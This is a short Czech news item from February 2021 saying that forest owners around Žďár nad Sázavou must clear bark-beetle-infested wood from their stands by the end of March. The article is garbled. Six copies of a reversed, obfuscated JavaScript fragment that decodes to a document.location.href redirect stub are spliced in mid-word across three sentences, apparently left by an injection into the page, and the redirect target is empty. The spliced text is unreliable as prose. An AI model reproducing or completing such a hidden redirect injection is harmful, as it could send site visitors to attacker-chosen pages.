Rainbow page separator

Dřevo napadené kůrovcem musí z lesa ven do konce března

Pondělí, 15. února 2021

Žďár nad Sázavou / Do konce března musí vlastníci lesů na Žďársku z porostů odstranit veškeré dřevo napadené kůrovcem. Jedná se o napadené zelené stromy s opadávající kůrou či stromy s rezavějícím jehličím, které je třeba zpracovat a odvést z lesa, popřípadě mechanicky asanovat, anebo chemicky ošetřit. K [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu musí dojít ještě před výletem první generace dospělých brouků z napadeného dříví, což nastane v jarních měsících. Souše, které kůrovec opustil již dříve, se zpracovávat nemusejí.
V souvislosti s pokračující kůrovcovou kalami[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou jsou majitelé lesů povinni porosty pravidelně kontrolovat, kupříkladu ve spolupráci s odborným lesním hospodářem, přičemž na činnosti spojené s eliminací šíření kůrovce stát poskytuje dotační podporu. V předešlých dvou letech kůrovcová kalamita ve větší míře zasáhla rovněž oblast Žďárských vrchů, přičemž řada lesních porostů již musela být vykácena, což bude podle odhadů lesníků pokračovat i v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce.